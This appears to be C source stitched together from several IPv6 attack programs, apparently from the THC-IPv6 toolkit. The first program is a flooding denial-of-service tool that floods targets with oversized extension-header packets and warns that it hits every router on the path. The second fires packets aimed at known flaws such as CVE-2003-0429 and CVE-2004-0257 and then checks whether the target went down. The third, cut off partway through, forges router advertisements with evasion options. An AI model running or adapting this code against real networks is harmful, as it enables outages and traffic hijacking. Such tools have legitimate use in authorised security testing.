int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[65536], bla[1500], tests[256];
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i, j, k, srcmtu, fragsize;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface, *randptr = NULL;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
if ((dst6 = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
exit(-1);
}
//route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface: %s\n", interface);
exit(-1);
}
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
fragsize = ((srcmtu - 62) / 8) * 8;
setvbuf(stdout, NULL, _IONBF, 0);
memset(buf, 0, sizeof(buf));
memset(tests, 0, sizeof(tests));
memset(bla, 0, sizeof(bla));
if (test < 1 || test > MAX_TEST) {
printf("%s %s (c) 2014 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
printf("The following test cases are currently implemented:\n");
printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n");
printf(" 2 : large destination header filled with unknown options\n");
printf(" 3 : hop-by-hop header with router alert option plus 180 headers\n");
printf(" 4 : hop-by-hop header with router alert option plus 178 headers + ping\n");
printf(" 5 : AH header + ping\n");
printf(" 6 : first fragments of a ping with a hop-by-hop header with router alert\n");
printf(" 7 : large hop-by-hop header filled with unknown options (no router alert)\n");
exit(0);
}
printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");
/********************** TEST CASE PREPARATION *************************/
if (test == count) { // 1432
printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
j = 4;
i = 1;
while (i <= 67) {
k = (i % 63) + 1;
buf[j] = k;
switch (k) {
case 38: // quickstart
buf[j + 1] = 7; // length
buf[j + 2] = 1; // request type + rate
buf[j + 3] = 60; //qs-ttl
buf[j + 4] = 8; // nonce
j += 9;
break;
case 4:
buf[j + 1] = 1;
j += 3;
break;
case 0:
case 5:
buf[j] = 1;
// fall through
default:
buf[j + 1] = 4;
j += 6;
}
// j += buf[j + 1] + 2;
i++;
}
// for (i = 1; i < 236; i++) {
// buf[i * 6 - 2] = (i % 63) + 1;
// buf[i * 6 - 1] = 4;
// }
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // 1432
printf("Test %d: large destination header filled with unknown options.\n", count);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
for (i = 1; i < 237; i++) {
buf[6 + i * 6] = (i % 63) + 1;
buf[5 + i * 6] = 4;
}
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) {
j = (thc_get_mtu(interface) - 48) / 8;
if (j < 150 || j > 8000) {
fprintf(stderr, "Error: invalid MTU on interface\n");
exit(-1);
}
printf("Test %d: hop-by-hop header with router alert option plus %d headers.\n", count, j);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
return -1;
memset(buf, 0, 2);
for (i = 0; i < j; i++)
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
return -1;
// thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) {
j = (thc_get_mtu(interface) - 64) / 8;
if (j < 150 || j > 8000) {
fprintf(stderr, "Error: invalid MTU on interface\n");
exit(-1);
}
printf("Test %d: hop-by-hop header with router alert option plus %d headers plus ping.\n", count, j);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
return -1;
memset(buf, 0, 2);
for (i = 0; i < j; i++)
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) {
printf("Test %d: AH header plus ping.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6 + 8) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
if (do_hdr_size != 0)
ipv6->pkt[do_hdr_size + 40 + 1] = 2;
else
ipv6->pkt[14 + 40 + 1] = 2;
}
count++;
if (test == count) {
printf("Test %d: first ping fragment with hop-by-hop and router alert.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
buf[0] = 5;
buf[1] = 2;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0)
return -1;
if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, 0xfacebabe + getpid() + count))
return -1;
buf[0] = ICMP6_MLD_REPORT;
buf[1] = 0;
buf[2] = 0xb0;
buf[3] = 0x0b;
if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, buf, 14))
return -1;
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
if (do_hdr_size != 0)
randptr = ipv6->pkt + do_hdr_size + 40 + 8 + 4;
else
randptr = ipv6->pkt + 14 + 40 + 8 + 4;
}
count++;
if (test == count) { // 1432
printf("Test %d: large hop-by-hop header with filled with unknown options (no router alert).\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
j = 0;
i = 1;
while (i <= 67) {
k = (i % 63) + 1;
buf[j] = k;
switch (k) {
case 38: // quickstart
buf[j + 1] = 7; // length
buf[j + 2] = 1; // request type + rate
buf[j + 3] = 60; //qs-ttl
buf[j + 4] = 8; // nonce
j += 9;
break;
case 4:
buf[j + 1] = 1;
j += 3;
break;
case 0:
case 5:
buf[j] = 1;
// fall through
default:
buf[j + 1] = 4;
j += 6;
}
// j += buf[j + 1] + 2;
i++;
}
// for (i = 1; i < 236; i++) {
// buf[i * 6 - 2] = (i % 63) + 1;
// buf[i * 6 - 1] = 4;
// }
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // dummy entry
// code
fprintf(stderr, "to implement\n");
exit(-1);
}
count++;
/******************* END OF TESTCASE PREPARATION **************************/
count = 0;
while (1) {
thc_send_pkt(interface, pkt, &pkt_len);
usleep(1);
count++;
if (randptr != NULL)
memcpy(randptr, (char*)&count + _TAKE4, 4);
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src ";
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i = 0, j, srcmtu, fragsize, offset = 14;
pcap_t *p;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
if (strcmp(argv[1], "-p") == 0) {
noping = 1;
argv++;
argc--;
}
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[1];
dst6 = thc_resolve6(argv[2]);
route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(buf, 0, sizeof(buf));
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
strcat(string, thc_ipv62notation(src6));
strcat(string2, thc_ipv62notation(dst6));
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
if (do_hdr_size)
srcmtu -= (do_hdr_size - 14);
fragsize = ((srcmtu - 62) / 8) * 8;
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
setvbuf(stdout, NULL, _IONBF, 0);
memset(tests, 0, sizeof(tests));
printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]);
if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) {
fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]);
exit(-1);
} else
printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n");
/********************** TEST CASES ************************/
if (test == 0 || test == count) { // 1432
printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count);
tmplen = 65864;
if ((mal = malloc(tmplen)) == NULL)
return -1;
memset(mal, count % 256, tmplen);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
// because of the different possible checksum calculations we have to do them all
hdr->pkt[offset + 40 + 3] = 0xe5;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 2] = 0x98;
hdr->pkt[offset + 40 + 3] = 0xa4;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 3] = 0xa3;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 2] = 0x84;
hdr->pkt[offset + 40 + 3] = 0x90;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 3] = 0x8f;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
free(mal);
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) { // 1432
printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count);
tmplen = 65527;
if ((mal = malloc(tmplen)) == NULL)
return -1;
memset(mal, count % 256, tmplen);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
// because of the different possible checksum calculations we have to do them all
hdr->pkt[offset + 40 + 2] = 0x31;
hdr->pkt[offset + 40 + 3] = 0x8c;
thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
hdr->pkt[offset + 40 + 3] = 0x8a;
thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
free(mal);
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
memset(bla, count % 256, sizeof(bla));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
memset(buf, 0, sizeof(buf));
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = 128; // prefix length // BUG IS HERE
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
memcpy(&buf[32], route6, 16);
i += 28;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, srcmac, 6);
i += 6;
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x00; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
i += 16; // 56-71 address, all zeros for default
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
sleep(1);
thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
i = 0;
while (ports[i] != 0) {
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
pkt_len = 0;
i++;
}
}
count++;
/*
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
*/
/*
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count%256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
*/
// more?
/******************* END OF TESTCASES ***************************/
if (noping == 1 || check_alive(p, interface, src6, dst6))
printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count);
else
printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count);
thc_pcap_close(p);
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[16] = "", dmac[16] = "";
unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
unsigned char *dst = thc_resolve6("ff02::1");
unsigned char *dstmac = thc_get_multicast_mac(dst);
int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
unsigned char *pkt = NULL, *searchlist = NULL;
int pkt_len = 0;
pcap_t *p;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
memset(rbuf, 0, sizeof(rbuf));
memset(mac, 0, sizeof(mac));
while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
switch (i) {
case 'i':
interval = atoi(optarg);
break;
case 'm':
sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
(unsigned int *) &dmac[5]);
dstmac = dmac;
break;
case 'S':
sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
mac6 = mac;
break;
case 's':
if ((ip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);
exit(-1);
}
break;
case 'M':
mtu = atoi(optarg);
if (mtu < 0 || mtu > 65535) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu);
break;
case 'n':
to_send = atoi(optarg);
if (to_send < 1 || mtu > 255) {
fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg);
exit(-1);
}
break;
case 'A':
if (pcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES);
exit(-1);
}
if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
exit(-1);
}
*ptr++ = 0;
if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-)
fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg);
exit(-1);
}
if (size != 64)
fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size);
if (index(optarg, ':') == NULL)
strcat(optarg, "::");
if ((routerip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg);
exit(-1);
}
pbuf[pcnt][0] = size % 256;
memcpy((char *) &pbuf[pcnt][1], routerip6, 16);
pcnt++;
break;
case 'a':
plife = atoi(optarg);
break;
case 'r':
rlife = atoi(optarg);
break;
case 'd':
dlife = atoi(optarg);
break;
case 'l':
llife = atoi(optarg);
break;
case 'T':
reach = atoi(optarg);
break;
case 't':
trans = atoi(optarg);
break;
case 'p':
if (strncasecmp(optarg, "low", 3) == 0)
prio = 0;
else
if (strncasecmp(optarg, "med", 3) == 0)
prio = 1;
else
if (strncasecmp(optarg, "hi", 2) == 0)
prio = 2;
else
if (strncasecmp(optarg, "res", 3) == 0)
prio = 3;
else {
fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg);
exit(-1);
}
break;
case 'R':
if (rcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES);
exit(-1);
}
if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
exit(-1);
}
*ptr++ = 0;
if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-)
fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg);
exit(-1);
}
if (index(optarg, ':') == NULL)
strcat(optarg, "::");
if ((routerip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg);
exit(-1);
}
rbuf[rcnt][0] = size % 256;
memcpy((char *) &rbuf[rcnt][1], routerip6, 16);
rcnt++;
break;
case 'D':
if (dcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES);
exit(-1);
}
if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg);
exit(-1);
}
break;
case 'L':
searchlist = optarg;
break;
case 'E':
if (optarg == NULL) {
fprintf(stderr, "Error: no option type given for -E\n");
exit(-1);
}
for (j = 0; j < strlen(optarg); j++) {
switch (optarg[j]) { // fall through to be fail safe on accidental misuse
case '0': // fall through
case 'O':
do_overlap = 1;
break;
case 'o':
do_overlap = 2;
break;
case '1': // fall through
case 'l': // fall through
case 'L':
do_frag++;
break;
case 'h': // fall through
case 'H':
do_hop = 1;
break;
case 'd': // fall through
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]);
exit(-1);
}
if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) {
fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n");
exit(-1);
}
}
break;
case 'F':
ptr = strtok(optarg, ",");
while (ptr != NULL) {
if (strncasecmp(ptr, "man", 3) == 0)
flags = (flags | 128);
else if (strncasecmp(ptr, "oth", 3) == 0)
flags = (flags | 64);
else if (strncasecmp(ptr, "hom", 3) == 0)
flags = (flags | 32);
else if (strncasecmp(ptr, "prox", 4) == 0)
flags = (flags | 4);
else if (strncasecmp(ptr, "res", 3) == 0)
flags = (flags | 2);
else if (strncasecmp(ptr, "unk", 3) == 0)
flags = (flags | 1);
else {
fprintf(stderr, "Error: unknown flag: %s\n", ptr);
exit(-1);
}
ptr = strtok(NULL, ",");
}
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if ((argc - optind) < 1 || (argc - optind) > 2)
help(argv[0]);
if (do_hdr_size)
myoff = do_hdr_size;
interface = argv[optind];
if (argc - optind == 2)
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
exit(-1);
}
if (mtu == 0)
mtu = thc_get_mtu(interface);
if (mac6 == NULL)
if ((mac6 = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (ip6 == NULL)
if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
exit(-1);
}
// if (dns == NULL)
// dns = thc_resolve6("ff02::fb");
frint = interface;
frip6 = ip6;
frmac = mac6;
frbuf = buf;
frbuf2 = buf2;
frbuf2len = sizeof(buf2);
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if (llife > 0xffff)
llife = 0xffff;
llife = (llife | 0xff000000);
if (prio == 2)
llife = (llife | 0x00080000);
else if (prio == 0)
llife = (llife | 0x00180000);
else if (prio != 1)
llife = (llife | 0x00100000);
llife = (llife | (flags << 16));
buf[0] = reach / 16777216;
buf[1] = (reach % 16777216) / 65536;
buf[2] = (reach % 65536) / 256;
buf[3] = reach % 256;
buf[4] = trans / 16777216;
buf[5] = (trans % 16777216) / 65536;
buf[6] = (trans % 65536) / 256;
buf[7] = trans % 256;
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
i = 16;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, mac6, 6);
i += 6;
// option prefix, put all in
if (pcnt > 0)
for (j = 0; j < pcnt; j++) {
buf[i++] = 3;
buf[i++] = 4;
buf[i++] = pbuf[j][0]; // prefix length
buf[i++] = 128 + 64;
buf[i++] = plife / 16777216;
buf[i++] = (plife % 16777216) / 65536;
